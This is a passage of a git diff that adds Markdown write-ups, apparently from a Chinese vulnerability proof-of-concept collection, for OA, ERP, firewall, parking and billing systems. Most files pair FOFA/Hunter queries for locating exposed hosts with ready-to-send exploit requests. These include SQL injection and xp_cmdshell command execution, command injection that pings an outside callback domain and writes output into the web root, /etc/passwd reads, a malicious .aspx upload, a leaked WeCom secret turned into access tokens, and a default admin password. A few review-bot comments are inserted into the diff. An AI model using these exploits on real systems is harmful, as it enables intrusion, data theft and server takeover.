+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uml4ee1m5cxyvkfo> \ No newline at end of file diff --git a/企业微信接口未授权访问漏洞.md b/企业微信接口未授权访问漏洞.md new file mode 100644 index 0000000..5d8db74 --- /dev/null +++ b/企业微信接口未授权访问漏洞.md 
@@ -0,0 +1,46 @@ +# 企业微信接口未授权访问漏洞 + +# 一、漏洞简介 +企业微信/cgi-bin/gateway/agentinfo接口未授权情况下可直接获取企业微信secret等敏感信息,可导致企业微信全量数据被获取,文件获取、使用企业微信轻应用对内利用发送钓鱼文件和链接等风险。 + +# 二、影响版本 ++ 企业微信 + +# 三、资产测绘 ++ hunter:`web.icon=="e1750fed09bcc7df102a0e593ffe2b69"` + +![1691831077389-ecf0d266-1973-476d-bf80-28bd79c62d0b.png](./img/BQkOXYezQukpooIW/1691831077389-ecf0d266-1973-476d-bf80-28bd79c62d0b-918918.png) + ++ 登录页面: + +![1691831352586-b9e544cc-78cf-4feb-9071-83176a213f2b.png](./img/BQkOXYezQukpooIW/1691831352586-b9e544cc-78cf-4feb-9071-83176a213f2b-341488.png) + + + +# 四、漏洞复现 +1. 通过泄露信息接口可以获取`corpid`和`corpsecret` + +```plain +https://<企业微信域名>/cgi-bin/gateway/agentinfo +``` + +![1691831388927-6404a99b-4034-461e-a122-4b378f76f340.png](./img/BQkOXYezQukpooIW/1691831388927-6404a99b-4034-461e-a122-4b378f76f340-481930.png) + +2. 使用`corpsecret`和`corpid`获得`token`,其中`corpid`为上图中`strcorpid`、`corpsecret`为上图中`Secret` + +```plain +https://<企业微信域名>/cgi-bin/gettoken?corpid=ID&corpsecret=SECRET +``` + +![1691831554361-cc7d1845-d373-4ee1-8c7f-5766106c7504.png](./img/BQkOXYezQukpooIW/1691831554361-cc7d1845-d373-4ee1-8c7f-5766106c7504-710668.png) + +3. 使用token访问诸如企业通讯录信息,修改用户密码,发送消息,云盘等接口 + + 具体利用查看[企业微信开发者中心文档](https://developer.work.weixin.qq.com/document/path/90664) + +![1691832111634-97ade7db-7f46-4771-ba7b-0b02cd26253c.png](./img/BQkOXYezQukpooIW/1691832111634-97ade7db-7f46-4771-ba7b-0b02cd26253c-905023.png) + + + +> 更新: 2024-02-29 23:58:31 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gb52tl24nioiceab> \ No newline at end of file diff --git a/企望制造-ERP-comboxstore.action-远程命令执行漏洞.md b/企望制造-ERP-comboxstore.action-远程命令执行漏洞.md new file mode 100644 index 0000000..9326794 --- /dev/null +++ b/企望制造-ERP-comboxstore.action-远程命令执行漏洞.md @@ -0,0 +1,9 @@ +## 企望制造 ERP comboxstore.action 远程命令执行漏洞 +``` + +POST /mainFunctions/comboxstore.action HTTP/1.1 +Content-Type: application/x-www-form-urlencoded +Host: xxx.xxx.xxx.xxx + +comboxsql=exec%20xp_cmdshell%20'type%20C:\Windows\Win.ini' +``` 
diff --git a/企望制造ERPcomboxstore.actionSQL注入漏洞.md b/企望制造ERPcomboxstore.actionSQL注入漏洞.md new file mode 100644 index 0000000..6b046e2 --- /dev/null +++ b/企望制造ERPcomboxstore.actionSQL注入漏洞.md @@ -0,0 +1,49 @@ +# 企望制造ERP comboxstore.action SQL注入漏洞 + +# 一、漏洞简介 +企望制造eERP系统由深知纸箱行业特点和业务流程的多位IT专家打造,具有国际先进的管理方式,将现代化的管理方式融入erp软件中,让企业分分钟就拥有科学的管理经验。 erp的功能包括成本核算、报价定价、订单下达、生产下单、现场管理等多种功能。由于企望制造 ERP comboxstore.action接口权限设置不当,默认的配置可执行任意SQL语句,利用xp_cmdshell函数可远程执行命令,未经认证的攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 企望制造ERP系统 + +# 三、资产测绘 ++ hunter`app.name="企望制造ERP"` ++ 登录页面 + +![1693910033825-52c78947-5989-4307-9115-aad9c9a3a87e.png](./img/g3JR0CDELSXnpqfr/1693910033825-52c78947-5989-4307-9115-aad9c9a3a87e-529920.png) + +# 四、漏洞复现 +1.访问`poc`出现如下页面表示存在漏洞 + +```plain +/mainFunctions/comboxstore.action +``` + +![1693910438559-36044b06-551f-4853-ac6d-8de9fbe97157.png](./img/g3JR0CDELSXnpqfr/1693910438559-36044b06-551f-4853-ac6d-8de9fbe97157-625317.png) + +2. 执行SQL语句获取数据库版本 + +```plain +POST /mainFunctions/comboxstore.action HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=7256C68B9C89F11BE2F841C3F1CAA415 +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 29 + +comboxsql=select%20@@version; +``` + +![1693910681210-3bb44a13-6f9c-450e-9a10-9309fa6f8cc2.png](./img/g3JR0CDELSXnpqfr/1693910681210-3bb44a13-6f9c-450e-9a10-9309fa6f8cc2-183096.png) + +![1693911193284-eefe9f64-ead8-478a-ac99-b62baaa53d9f.png](./img/g3JR0CDELSXnpqfr/1693911193284-eefe9f64-ead8-478a-ac99-b62baaa53d9f-226165.png) + + + +> 更新: 2024-02-29 23:55:50 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ry4xq0e8le5qgn5r> \ No newline at end of file 
diff --git a/企望制造ERP系统drawGrid.action存在SQL漏洞.md b/企望制造ERP系统drawGrid.action存在SQL漏洞.md new file mode 100644 index 0000000..ba2cec1 --- /dev/null +++ b/企望制造ERP系统drawGrid.action存在SQL漏洞.md @@ -0,0 +1,26 @@ +# 企望制造ERP系统drawGrid.action存在SQL漏洞 + +企望制造ERP系统 drawGrid.action 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```javascript +title="企望制造ERP系统" +``` + +## poc + +```javascript +POST /mainFunctions/drawGrid.action;cookieLogin.action HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Content-Type: application/x-www-form-urlencoded +Connection: close + +tablename=1';WAITFOR DELAY '0:0:5'-- +``` + +![image-20241114140739587](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141407656.png) \ No newline at end of file diff --git a/众智OA办公系统Login存在SQL注入漏洞.md b/众智OA办公系统Login存在SQL注入漏洞.md new file mode 100644 index 0000000..4366daf --- /dev/null +++ b/众智OA办公系统Login存在SQL注入漏洞.md 
@@ -0,0 +1,26 @@ +# 众智OA办公系统Login存在SQL注入漏洞 + +众智OA办公系统Login存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript +body="/Account/Login?ACT=Index" +``` + +## poc + +```javascript +POST /Account/Login?ACT=Index&CLR=Home HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Encoding: gzip, deflate + +username=1');WAITFOR+DELAY+'0:0:5'--&password=1&RememberMe=false +``` + +![image-20241012132503527](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121325595.png) \ No newline at end of file diff --git a/众诚网上订单系统o_sa_order.ashx存在SQL注入漏洞.md b/众诚网上订单系统o_sa_order.ashx存在SQL注入漏洞.md new file mode 100644 index 0000000..c1eb463 --- /dev/null +++ b/众诚网上订单系统o_sa_order.ashx存在SQL注入漏洞.md @@ -0,0 +1,27 @@ +# 众诚网上订单系统o_sa_order.ashx存在SQL注入漏洞 + +众诚网上订单系统o_sa_order.ashx存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```yaml +title="众诚网上订单系统" +``` + +## poc + +```javascript +POST /ajax/o_sa_order.ashx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br, zstd +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Connection: keep-alive +Priority: u=0 + +type=login&user_id=1%27);WAITFOR%20DELAY%20%270:0:5%27--&user_pwd=1 +``` + diff --git a/众诚网上订单系统o_sa_order存在SQL注入漏洞.md b/众诚网上订单系统o_sa_order存在SQL注入漏洞.md new file mode 100644 index 0000000..10190ca --- /dev/null +++ b/众诚网上订单系统o_sa_order存在SQL注入漏洞.md 
@@ -0,0 +1,38 @@ +# 众诚网上订单系统o_sa_order存在SQL注入漏洞 + +# 一、漏洞简介 +众诚网上订单系统o_sa_order存在SQL注入漏洞,攻击者可获取数据库敏感信息。 + +# 二、影响版本 ++ DBApi + +# 三、资产测绘 ++ fofa`title="欢迎使用众诚网上订单系统"` ++ 特征 + +![1725327701850-b2fe295e-5169-4bf6-a0bf-451d4d6b9a96.png](./img/3-Rm4Tgak8tfb8DR/1725327701850-b2fe295e-5169-4bf6-a0bf-451d4d6b9a96-637276.png) + +# 四、漏洞复现 +```plain +POST /ajax/o_sa_order.ashx HTTP/1.1 +Host: +Content-Length: 42 +Accept: */* +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 +Connection: keep-alive + +type=login&user_id=admin'&user_pwd=1111111 +``` + +![1725327746928-f84f08d3-735c-4fb4-9b17-0fafb6d5bb35.png](./img/3-Rm4Tgak8tfb8DR/1725327746928-f84f08d3-735c-4fb4-9b17-0fafb6d5bb35-682291.png) + + + + + +> 更新: 2024-10-22 09:36:10 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ey0ogvbchsz4zpil> \ No newline at end of file diff --git a/优客API接口管理系统存在SQL注入漏洞.md b/优客API接口管理系统存在SQL注入漏洞.md new file mode 100644 index 0000000..0d9d78b --- /dev/null +++ b/优客API接口管理系统存在SQL注入漏洞.md 
@@ -0,0 +1,36 @@ +# 优客API接口管理系统存在SQL注入漏洞 + +# 一、漏洞简介 +优客API接口管理系统,内置30+API接口,支持服务器信息,网站ICP备案,抖音无水印,QQ在线状态QQ头像,获取历史上的今天,IP签名档,ICO站标获,随机动漫图,网站标题获取,爱站权重获取,城市天气获取,随机一言,皮皮虾无水印,每日Bing壁纸,垃圾分类,查询手机号归属地,申通快递查询等接口功能。优客API接口管理系统存在SQL注入漏洞 + +# 二、影响版本 ++ 优客API接口管理系统 + +# 三、资产测绘 ++ fofa + +```plain +"public/static/index/css/flaghome.css" +``` + ++ 特征 + +![1731383630664-4e1345d0-9673-4677-bcc6-1ca61d9895ab.png](./img/TRHl7koVp2Qt2mXm/1731383630664-4e1345d0-9673-4677-bcc6-1ca61d9895ab-780835.png) + +# 四、漏洞复现 +```plain +POST /index/index/doc HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 +Connection: close + +id=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20)),NULL-- - +``` + +![1731383899209-0422239d-a29b-46dd-8538-6b6be399667b.png](./img/TRHl7koVp2Qt2mXm/1731383899209-0422239d-a29b-46dd-8538-6b6be399667b-371311.png) + + + +> 更新: 2024-11-27 10:00:07 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xphkgwr0lgod5047> \ No newline at end of file diff --git a/优客API接口管理系统存在信息泄露漏洞.md b/优客API接口管理系统存在信息泄露漏洞.md new file mode 100644 index 0000000..ad0d68d --- /dev/null +++ b/优客API接口管理系统存在信息泄露漏洞.md 
@@ -0,0 +1,30 @@ +# 优客API接口管理系统存在信息泄露漏洞 + +# 一、漏洞简介 +优客API接口管理系统,内置30+API接口,支持服务器信息,网站ICP备案,抖音无水印,QQ在线状态QQ头像,获取历史上的今天,IP签名档,ICO站标获,随机动漫图,网站标题获取,爱站权重获取,城市天气获取,随机一言,皮皮虾无水印,每日Bing壁纸,垃圾分类,查询手机号归属地,申通快递查询等接口功能。优客API接口管理系统存在信息泄露漏洞 + +# 二、影响版本 ++ 优客API接口管理系统 + +# 三、资产测绘 ++ fofa + +```plain +"public/static/index/css/flaghome.css" +``` + ++ 特征 + +![1731383630664-4e1345d0-9673-4677-bcc6-1ca61d9895ab.png](./img/h0O5SDzmZG9iW3Ie/1731383630664-4e1345d0-9673-4677-bcc6-1ca61d9895ab-181220.png) + +# 四、漏洞复现 +```plain +/runtime/log/202411/12.log +``` + +![1731383690530-7769f625-05cd-4ee1-9f65-7636c415cadb.png](./img/h0O5SDzmZG9iW3Ie/1731383690530-7769f625-05cd-4ee1-9f65-7636c415cadb-694826.png) + + + +> 更新: 2024-11-27 10:00:07 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ptvdeuz7cchr75g8> \ No newline at end of file diff --git a/会捷通云视讯平台任意文件读取漏洞.md b/会捷通云视讯平台任意文件读取漏洞.md new file mode 100644 index 0000000..0e92bcb --- /dev/null +++ b/会捷通云视讯平台任意文件读取漏洞.md 
@@ -0,0 +1,36 @@ +# 会捷通云视讯平台任意文件读取漏洞 + +# 一、漏洞复现 +<font style="color:rgb(0,0,0);">会捷通云视讯平台是基于软视频会议在私有云或者公有云环境下提供的企业级视频通讯平台,可以为用户提供跨越企业内外,基于会议室、桌面和移动应用的视频通讯和会议解决方案,会捷通云视讯平台平台fileDownload处存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件。</font> + +# <font style="color:rgb(0,0,0);">二、影响版本</font> ++ <font style="color:rgb(0,0,0);">会捷通云视讯平台</font> + +# <font style="color:rgb(0,0,0);">三、资产测绘</font> ++ hunter`web.body="/him/api/rest/v1.0/node/role"` ++ 特征 + +![1699886043031-85921d94-a0de-4ee2-b42e-019690c22439.png](./img/LdsjjeXaM_Wwu42w/1699886043031-85921d94-a0de-4ee2-b42e-019690c22439-950668.png) + +# 四、漏洞复现 +```plain +POST /fileDownload HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 46 + +action=downloadBackupFile&fullPath=/etc/passwd +``` + +![1699886073566-3a3c1975-ac9a-4dfa-b1fd-af7c9d921c50.png](./img/LdsjjeXaM_Wwu42w/1699886073566-3a3c1975-ac9a-4dfa-b1fd-af7c9d921c50-061757.png) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cbnq9fgdga6chkxw> \ No newline at end of file diff --git a/佑友防火墙存在信息泄露漏洞.md b/佑友防火墙存在信息泄露漏洞.md new file mode 100644 index 0000000..d6c1fb2 --- /dev/null +++ b/佑友防火墙存在信息泄露漏洞.md 
@@ -0,0 +1,26 @@ +# 佑友防火墙存在信息泄露漏洞 + +# 一、漏洞简介 +佑友防火墙+路由,保障您的网络更安全更稳定。弥补传统路由器因内外人数增加带来的网络延迟和不稳定问题;防火墙模块具备了防黑功能,防止ARP等病毒骚扰;佑友防火墙网关同时还配备了上网行为管理模块,可以合理有效控制员工上网行为,大大降低了员工上网中病毒的概率,同时高效使用公司带宽,不会造成网络阻塞等状况。佑友防火墙系统存在敏感信息泄露漏洞 + +# 二、影响版本 ++ 佑友防火墙 + +# 三、资产测绘 +```plain +fofa:title="佑友防火墙" +``` + +![1716105993266-59e9b128-8a93-41a8-b677-00d8945bcb20.png](./img/tjcmVWMdveMKzpDP/1716105993266-59e9b128-8a93-41a8-b677-00d8945bcb20-272803.png) + +# 四、漏洞复现 +```plain +/index.php?c=index&a=ajax_getSystemResource +``` + +![1716106363889-c8322d3e-f2a2-431a-95ac-5c624b224d66.png](./img/tjcmVWMdveMKzpDP/1716106363889-c8322d3e-f2a2-431a-95ac-5c624b224d66-034201.png) + + + +> 更新: 2024-05-23 12:38:07 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gkhyz7gekz2ws3s3> \ No newline at end of file diff --git a/佑友防火墙存在后台命令执行漏洞.md b/佑友防火墙存在后台命令执行漏洞.md new file mode 100644 index 0000000..968cb17 --- /dev/null +++ b/佑友防火墙存在后台命令执行漏洞.md @@ -0,0 +1,26 @@ +# 佑友防火墙存在后台命令执行漏洞 + +# 一、漏洞简介 +佑友防火墙+路由,保障您的网络更安全更稳定。弥补传统路由器因内外人数增加带来的网络延迟和不稳定问题;防火墙模块具备了防黑功能,防止ARP等病毒骚扰;佑友防火墙网关同时还配备了上网行为管理模块,可以合理有效控制员工上网行为,大大降低了员工上网中病毒的概率,同时高效使用公司带宽,不会造成网络阻塞等状况。佑友防火墙系统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。 + +# 二、影响版本 ++ 佑友防火墙 + +# 三、资产测绘 +```plain +fofa:title="佑友防火墙" +``` + +![1716105993266-59e9b128-8a93-41a8-b677-00d8945bcb20.png](./img/dTTMnaA5q2lFgY7w/1716105993266-59e9b128-8a93-41a8-b677-00d8945bcb20-186037.png) + +# 四、漏洞复现 +```plain +找到系统管理→维护工具→ping→执行whoami命令得到回显 +``` + +![1716106161838-dda3beeb-dccc-4f50-a473-b4c6a093791e.png](./img/dTTMnaA5q2lFgY7w/1716106161838-dda3beeb-dccc-4f50-a473-b4c6a093791e-945765.png) + + + +> 更新: 2024-05-23 12:38:07 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dnch59c7m2isqzw2> \ No newline at end of file diff --git a/佑友防火墙存在默认口令漏洞.md b/佑友防火墙存在默认口令漏洞.md new file mode 100644 index 0000000..13a5e35 --- /dev/null +++ b/佑友防火墙存在默认口令漏洞.md 
@@ -0,0 +1,26 @@ +# 佑友防火墙存在默认口令漏洞 + +# 一、漏洞简介 +佑友防火墙+路由,保障您的网络更安全更稳定。弥补传统路由器因内外人数增加带来的网络延迟和不稳定问题;防火墙模块具备了防黑功能,防止ARP等病毒骚扰;佑友防火墙网关同时还配备了上网行为管理模块,可以合理有效控制员工上网行为,大大降低了员工上网中病毒的概率,同时高效使用公司带宽,不会造成网络阻塞等状况。佑友防火墙存在默认口令漏洞 + +# 二、影响版本 ++ 佑友防火墙 + +# 三、资产测绘 +```plain +fofa:title="佑友防火墙" +``` + +![1716105993266-59e9b128-8a93-41a8-b677-00d8945bcb20.png](./img/sg2br7PaX_gQpP-2/1716105993266-59e9b128-8a93-41a8-b677-00d8945bcb20-017336.png) + +# 四、漏洞复现 +```plain +admin/hicomadmin +``` + +![1716106018479-cb20cbb5-da13-4acb-aba6-eba716b39807.png](./img/sg2br7PaX_gQpP-2/1716106018479-cb20cbb5-da13-4acb-aba6-eba716b39807-983609.png) + + + +> 更新: 2024-05-23 12:38:07 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uic5wcwdni05byd6> \ No newline at end of file diff --git a/信呼OA办公系统后台uploadAction存在SQL注入.md b/信呼OA办公系统后台uploadAction存在SQL注入.md new file mode 100644 index 0000000..7439c7f --- /dev/null +++ b/信呼OA办公系统后台uploadAction存在SQL注入.md @@ -0,0 +1,37 @@ +# 信呼OA办公系统后台uploadAction存在SQL注入 + +信呼OA办公系统是一个开源的在线办公系统。 信呼OA办公系统uploadAction存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。 + +## fofa + +```java +icon_hash="1652488516" +``` + +## poc + +```javascript +GET /xhoa/api.php?a=getmfilv&m=upload|api&d=task&fileid=1&fname=MScgYW5kIHNsZWVwKDYpIw== HTTP/1.1 +Host: +sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129" +Sec-Fetch-Dest: empty +Accept: application/json, text/javascript, */*; q=0.01 +Referer: http://127.0.0.1:81/xhoa/ +Cookie: +Sec-Fetch-Mode: cors +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate, br, zstd +Sec-Fetch-Site: same-origin +Accept-Language: zh-CN,zh;q=0.9 +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Windows" +``` + +![image-20241128092859877](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280928931.png) + + + +## 漏洞来源 + +- https://forum.butian.net/article/613 \ No newline at end of file 
diff --git a/停车场后台管理系统GetVideo存在SQL注入漏洞.md b/停车场后台管理系统GetVideo存在SQL注入漏洞.md new file mode 100644 index 0000000..71c5d0d --- /dev/null +++ b/停车场后台管理系统GetVideo存在SQL注入漏洞.md @@ -0,0 +1,23 @@ +# 停车场后台管理系统GetVideo存在SQL注入漏洞 + +停车场后台管理系统 LaneMonitor/GetVideo 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。 + +## fofa + +```java +icon_hash="938984120" +``` + +## poc + +```javascript +GET /LaneMonitor/GetVideo?passwayno=1%27+AND+GTID_SUBSET%28CONCAT%280x71627a7871%2C%28SELECT+%28ELT%283079%3D3079%2C1%29%29%29%2C0x7176786b71%29%2C3079%29+AND+%27OVwj%27%3D%27OVwj HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +``` + +![image-20250217095300994](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502170953065.png) \ No newline at end of file diff --git a/傲盾信息安全管理系统前台远程命令执行漏洞.md b/傲盾信息安全管理系统前台远程命令执行漏洞.md new file mode 100644 index 0000000..725d680 --- /dev/null +++ b/傲盾信息安全管理系统前台远程命令执行漏洞.md 
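Review bot: the description sentence in 停车场后台管理系统GetVideo存在SQL注入漏洞.md is truncated (除了可以利用 SQL 注入漏洞获取数据库中的信息 has no closing 之外 clause); either finish the sentence or drop the 除了. The fofa query is fenced as ```java and the request as ```javascript, and no affected version or vendor name is recorded.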
@@ -0,0 +1,57 @@ +# 傲盾信息安全管理系统前台远程命令执行漏洞 + +# 一、漏洞简介 +傲盾信息安全管理系统是傲盾网络科技股份有限公司的一个信息安全管理产品。该系统的前台存在远程命令执行漏洞,远程攻击者可以构造特殊的请求,注入系统命令,由于过滤不足,导致成功在目标服务器执行任意系统命令。 ,该远程命令执行漏洞的利用难度低,可导致远程命令执行。 + +# 二、影响版本 ++ 傲盾信息安全管理系统 + +# 三、资产测绘 ++ fofa`body="傲盾软件" && body="aodun/aodun.js"` ++ 特征 + +![1734507351814-666bd451-fc4e-49e9-884e-46941e2d1842.png](./img/iKy_I61sKHi42MYu/1734507351814-666bd451-fc4e-49e9-884e-46941e2d1842-462573.png) + +# 四、漏洞复现 +```java +POST /user_management/sichuan_login HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 +Connection: close +Content-Length: 97 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Content-Type: application/x-www-form-urlencoded + +loginname=sysadmin&ticket=|ping tiqqklzooy.iyhc.eu.org +``` + +![1734507422139-2ded6327-4556-4eb0-82c8-9ed2e089e3a9.png](./img/iKy_I61sKHi42MYu/1734507422139-2ded6327-4556-4eb0-82c8-9ed2e089e3a9-169168.png) + +```java +POST /user_management/sichuan_login HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 +Connection: close +Content-Length: 97 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Content-Type: application/x-www-form-urlencoded + +loginname=sysadmin&ticket=|echo `id` > /adm/isms_web/static/base_static/js/aodun/1.txt +``` + +![1734525651756-bcce7769-4b89-414e-a37c-8129d0e6e578.png](./img/iKy_I61sKHi42MYu/1734525651756-bcce7769-4b89-414e-a37c-8129d0e6e578-034254.png) + +```java +/static/base_static/js/aodun/1.txt +``` + 
+![1734525670803-4f2787df-a54e-4cc5-8e94-9858b4aacbb4.png](./img/iKy_I61sKHi42MYu/1734525670803-4f2787df-a54e-4cc5-8e94-9858b4aacbb4-639030.png) + + + +> 更新: 2024-12-20 14:54:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sdu622si610nmpvy> \ No newline at end of file diff --git a/先锋WEB燃气收费系统AjaxService存在任意文件上传漏洞.md b/先锋WEB燃气收费系统AjaxService存在任意文件上传漏洞.md new file mode 100644 index 0000000..880f265 --- /dev/null +++ b/先锋WEB燃气收费系统AjaxService存在任意文件上传漏洞.md 
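Review bot: the first request in 傲盾信息安全管理系统前台远程命令执行漏洞.md embeds a specific third-party DNS callback domain and the second writes a fixed file name under the web root; both are artifacts of the tester's setup and should be obvious placeholders rather than literal values a reader would re-send. The description has a stray " ," and says 可导致远程命令执行 twice; the 影响版本 entry has no version, and the Content-Length: 97 header does not match either body.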
@@ -0,0 +1,55 @@ +# 先锋WEB燃气收费系统AjaxService存在任意文件上传漏洞 + +# 一、漏洞简介 +先锋WEB燃气收费系统是由杭州先锋电子技术股份有限公司开发的一款服务于能源行业的系统,先锋WEB燃气收费系统存在文件上传漏洞,可导致攻击者获取服务器权限。 + +# 二、影响版本 ++ 先锋WEB燃气收费系统 + +# 三、资产测绘 ++ fofa`app="先锋WEB燃气收费系统"` ++ 特征 + +![1704874235704-3e56b6a3-908c-40ed-b95e-56d707535373.png](./img/HdzFuW3QJddJoKxY/1704874235704-3e56b6a3-908c-40ed-b95e-56d707535373-574124.png) + +# 四、漏洞复现 +```java +POST /AjaxService/Upload.aspx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------38002115147665341923847377752 +Content-Length: 710 +Origin: null +Connection: close +Upgrade-Insecure-Requests: 1 + +-----------------------------38002115147665341923847377752 +Content-Disposition: form-data; name="Fdata"; filename="1ndex.aspx" +Content-Type: text/html + + +123 +-----------------------------38002115147665341923847377752 +Content-Disposition: form-data; name="submit" + +Submin +-----------------------------38002115147665341923847377752-- +``` + +![1704874299499-1f95c955-e080-4a8a-b9ae-cc15ac11c5e2.png](./img/HdzFuW3QJddJoKxY/1704874299499-1f95c955-e080-4a8a-b9ae-cc15ac11c5e2-839949.png) + +上传文件位置 + +```java +/UploadFile/202401/2024011004110066.aspx +``` + +![1704874346773-47fd980d-4198-4d87-b60b-20d20660ccd4.png](./img/HdzFuW3QJddJoKxY/1704874346773-47fd980d-4198-4d87-b60b-20d20660ccd4-793587.png) + + + +> 更新: 2024-02-29 23:55:42 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sra2po2of1g77mo7> \ No newline at end of file diff --git 